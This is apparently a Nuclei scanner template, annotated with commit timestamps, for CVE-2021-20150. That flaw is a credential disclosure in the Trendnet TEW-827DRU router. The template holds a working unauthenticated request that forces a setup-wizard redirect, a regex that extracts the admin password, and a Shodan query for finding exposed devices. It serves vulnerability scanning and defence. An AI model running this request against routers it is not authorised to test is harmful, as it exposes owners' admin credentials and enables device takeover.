2022-02-03 09:06:04 +00:00
id : CVE-2021-20150
info :
name : Trendnet AC2600 TEW-827DRU - Credentials Disclosure
author : gy741
severity : medium
2022-05-17 09:18:12 +00:00
description : Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
2022-02-03 09:06:04 +00:00
reference :
- https://www.tenable.com/security/research/tra-2021-54
2022-02-03 19:43:00 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
2022-02-03 09:06:04 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2022-02-03 09:06:04 +00:00
cve-id : CVE-2021-20150
cwe-id : CWE-287
2022-02-03 19:43:30 +00:00
metadata :
shodan-query : http.html:"TEW-827DRU"
2022-08-27 04:41:18 +00:00
tags : disclosure,router,tenable,cve,cve2021,trendnet
2022-02-03 09:06:04 +00:00
requests :
- raw :
- |
POST /apply_sec.cgi HTTP/1.1
Host : {{Hostname}}
action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
- 'ftp_username'
- 'ftp_password'
- 'ftp_permission'
2022-02-03 19:43:00 +00:00
- 'TEW-827DRU'
2022-02-03 09:06:04 +00:00
condition : and
- type : word
part : header
words :
- "text/html"
2022-02-03 19:43:00 +00:00
extractors :
- type : regex
part : body
name : password
group : 1
regex :
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
2022-04-07 13:53:15 +00:00
# Enhanced by mp on 2022/04/05